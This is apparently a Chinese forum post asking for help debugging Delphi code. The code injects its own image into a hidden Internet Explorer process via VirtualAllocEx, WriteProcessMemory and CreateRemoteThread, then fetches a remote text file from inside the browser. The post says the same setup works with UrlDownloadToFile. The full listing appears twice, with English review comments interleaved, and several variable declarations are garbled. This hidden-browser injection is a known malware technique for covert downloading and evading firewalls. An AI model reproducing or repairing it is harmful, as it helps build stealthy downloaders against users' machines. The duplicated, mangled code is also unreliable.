starsoul
在写进程注入程序时，我想得到网页上的内容，并不是下载网页。编译成功后运行出错。如果使用 UrlDownloadToFile 就可以下载程序，运行不会出错；如果使用我自己写的得到网页内容的函数就会出错。请帮我看看哪里出了问题，谢谢！先送上 200 分。
完整源代码如下:
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows, ShellApI, WinInet, Dialogs, SysUtils, StrUtils, Messages, StdCtrls, Classes, Controls;
function GetWebPage(const Url: string):string; // Fetch the body at Url over WinInet and return it as a string
// NOTE(review): the variable declarations below look mangled in transcription
// (":P"/":D" sequences appear to have been stripped, e.g. "szSizeBufferointer"),
// so the intended types are inferred rather than visible — confirm against the original source.
var
Session,
HttpFile:HINTERNET;
szSizeBufferointer;
dwLengthSizeBufferWord;
dwReservedWord;
dwFileSizeWord;
dwBytesReadWord;
ContentsChar;
begin
// Empty user agent, default access type, no proxy; the returned handle is not checked for nil.
Session:=InternetOpen('',0,niL,niL,0);
// Return value is not checked; a nil HttpFile would be passed on to every call below.
HttpFile:=InternetOpenUrl(Session,PChar(Url),niL,0,0,0);
dwLengthSizeBuffer:=1024;
// Info level 5 is HTTP_QUERY_CONTENT_LENGTH. szSizeBuffer and dwReserved are never
// assigned before this call, and the queried length is never copied into dwFileSize.
HttpQueryInfo(HttpFile,5,szSizeBuffer,dwLengthSizeBuffer,dwReserved);
// dwFileSize has not been assigned anywhere in this function when it is used as the allocation size.
GetMem(Contents,dwFileSize);
// Single read, no loop: dwBytesRead may be smaller than dwFileSize, and the buffer is
// not NUL-terminated before StrPas scans it below.
InternetReadFile(HttpFile,Contents,dwFileSize,dwBytesRead);
InternetCloseHandle(HttpFile);
InternetCloseHandle(Session);
Result:=StrPas(Contents);
FreeMem(Contents);
end;
//插入IE需要用到的函数
function GetIEAppPath:string; // Look up the registered iexplore.exe path, falling back to a fixed path
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength WORD; // NOTE(review): declaration appears mangled in transcription (likely a stripped ":D" of DWORD) — confirm against original
begin
vType := REG_SZ;
// The key path is written with forward slashes (registry paths use backslashes) — possibly a
// transcription artifact. KEY_ALL_ACCESS is requested for what is only a read; the return
// value is not checked, so iekey may be left unset for the calls below.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
// Reads the key's default value into iename. The buffer is not guaranteed to be
// NUL-terminated if the stored value fills all 256 bytes.
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
// Fallback; the %programfiles% token is returned literally, nothing here expands it.
Result := '%programfiles%/Internet Explorer/IEXPLORE.EXE';
// Called regardless of whether RegOpenKeyEx succeeded above.
RegCloseKey(iekey);
end;
procedure Download; // Download procedure: fetches a text file, shows each line, then exits the hosting process
// NOTE(review): RunInject passes this procedure as the remote thread entry point, so it is
// meant to execute inside the other process, not in this program's own.
var
i:integer;
sl:TStringList;
begin
sl:=TStringList.Create;
// Fetch the config file content; TStringList splits it into one entry per line.
sl.Text:=GetWebPage('http://127.0.0.1/ip.txt');
for I := 0 to sl.Count - 1 do
// Show each line of the text file. NOTE(review): the list object itself is passed
// rather than an element (sl[I]); this may be a transcription artifact — confirm.
ShowMessage(sl);
// Kill the opened IE process, i.e. the process this code is running in. sl is never freed.
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer); // Copy this program's own image into ProcessHandle and start EntryPoint there
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
// Base address of this process's own image (GetModuleHandle(nil) is the running executable).
Module := Pointer(GetModuleHandle(nil));
// Length of the memory image: SizeOfImage from the PE optional header, located via e_lfanew.
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
// Release whatever the target has at this image's base address so the copy can land at the
// same address (the program fixes its base with {$IMAGEBASE}); result is not checked.
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
// Reserve and commit Size bytes in the target at that base, readable/writable/executable.
// A nil result is not checked before it is used below.
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Raw copy of the whole image into the target; BytesWritten is not compared with Size.
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
// Create the remote thread at EntryPoint with Module as its argument; the injection ends here.
// The VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence against a foreign
// process handle is the classic remote-thread injection pattern that endpoint monitoring flags.
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject(); // Launch a hidden iexplore.exe, find it by window class, and inject Download into it
var
ProcessHandle, PID: longword;
// inject into iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
// Start IE with its window hidden.
winexec(PChar(GetIEAppPath),sw_hide);
// Fixed delay, then resolve the PID through the IE frame window. If FindWindow returns 0,
// GetWindowThreadProcessId does not write PID, which is then used uninitialized below.
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
// Open the process with full access. An unrelated process opening a freshly spawned,
// hidden browser with PROCESS_ALL_ACCESS is a common detection signal for this technique.
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
// Close the handle.
CloseHandle(ProcessHandle);
end;
BEGIN
// Program entry point: performs the injection into iexplore.exe (see RunInject).
RunInject();
end.
完整源代码如下:
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows, ShellApI, WinInet, Dialogs, SysUtils, StrUtils, Messages, StdCtrls, Classes, Controls;
function GetWebPage(const Url: string):string; // Fetch the body at Url over WinInet and return it as a string
// NOTE(review): the variable declarations below look mangled in transcription
// (":P"/":D" sequences appear to have been stripped, e.g. "szSizeBufferointer"),
// so the intended types are inferred rather than visible — confirm against the original source.
var
Session,
HttpFile:HINTERNET;
szSizeBufferointer;
dwLengthSizeBufferWord;
dwReservedWord;
dwFileSizeWord;
dwBytesReadWord;
ContentsChar;
begin
// Empty user agent, default access type, no proxy; the returned handle is not checked for nil.
Session:=InternetOpen('',0,niL,niL,0);
// Return value is not checked; a nil HttpFile would be passed on to every call below.
HttpFile:=InternetOpenUrl(Session,PChar(Url),niL,0,0,0);
dwLengthSizeBuffer:=1024;
// Info level 5 is HTTP_QUERY_CONTENT_LENGTH. szSizeBuffer and dwReserved are never
// assigned before this call, and the queried length is never copied into dwFileSize.
HttpQueryInfo(HttpFile,5,szSizeBuffer,dwLengthSizeBuffer,dwReserved);
// dwFileSize has not been assigned anywhere in this function when it is used as the allocation size.
GetMem(Contents,dwFileSize);
// Single read, no loop: dwBytesRead may be smaller than dwFileSize, and the buffer is
// not NUL-terminated before StrPas scans it below.
InternetReadFile(HttpFile,Contents,dwFileSize,dwBytesRead);
InternetCloseHandle(HttpFile);
InternetCloseHandle(Session);
Result:=StrPas(Contents);
FreeMem(Contents);
end;
//插入IE需要用到的函数
function GetIEAppPath:string; // Look up the registered iexplore.exe path, falling back to a fixed path
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength WORD; // NOTE(review): declaration appears mangled in transcription (likely a stripped ":D" of DWORD) — confirm against original
begin
vType := REG_SZ;
// The key path is written with forward slashes (registry paths use backslashes) — possibly a
// transcription artifact. KEY_ALL_ACCESS is requested for what is only a read; the return
// value is not checked, so iekey may be left unset for the calls below.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
// Reads the key's default value into iename. The buffer is not guaranteed to be
// NUL-terminated if the stored value fills all 256 bytes.
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
// Fallback; the %programfiles% token is returned literally, nothing here expands it.
Result := '%programfiles%/Internet Explorer/IEXPLORE.EXE';
// Called regardless of whether RegOpenKeyEx succeeded above.
RegCloseKey(iekey);
end;
procedure Download; // Download procedure: fetches a text file, shows each line, then exits the hosting process
// NOTE(review): RunInject passes this procedure as the remote thread entry point, so it is
// meant to execute inside the other process, not in this program's own.
var
i:integer;
sl:TStringList;
begin
sl:=TStringList.Create;
// Fetch the config file content; TStringList splits it into one entry per line.
sl.Text:=GetWebPage('http://127.0.0.1/ip.txt');
for I := 0 to sl.Count - 1 do
// Show each line of the text file. NOTE(review): the list object itself is passed
// rather than an element (sl[I]); this may be a transcription artifact — confirm.
ShowMessage(sl);
// Kill the opened IE process, i.e. the process this code is running in. sl is never freed.
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer); // Copy this program's own image into ProcessHandle and start EntryPoint there
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
// Base address of this process's own image (GetModuleHandle(nil) is the running executable).
Module := Pointer(GetModuleHandle(nil));
// Length of the memory image: SizeOfImage from the PE optional header, located via e_lfanew.
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
// Release whatever the target has at this image's base address so the copy can land at the
// same address (the program fixes its base with {$IMAGEBASE}); result is not checked.
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
// Reserve and commit Size bytes in the target at that base, readable/writable/executable.
// A nil result is not checked before it is used below.
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Raw copy of the whole image into the target; BytesWritten is not compared with Size.
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
// Create the remote thread at EntryPoint with Module as its argument; the injection ends here.
// The VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence against a foreign
// process handle is the classic remote-thread injection pattern that endpoint monitoring flags.
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject(); // Launch a hidden iexplore.exe, find it by window class, and inject Download into it
var
ProcessHandle, PID: longword;
// inject into iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
// Start IE with its window hidden.
winexec(PChar(GetIEAppPath),sw_hide);
// Fixed delay, then resolve the PID through the IE frame window. If FindWindow returns 0,
// GetWindowThreadProcessId does not write PID, which is then used uninitialized below.
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
// Open the process with full access. An unrelated process opening a freshly spawned,
// hidden browser with PROCESS_ALL_ACCESS is a common detection signal for this technique.
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
// Close the handle.
CloseHandle(ProcessHandle);
end;
BEGIN
// Program entry point: performs the injection into iexplore.exe (see RunInject).
RunInject();
end.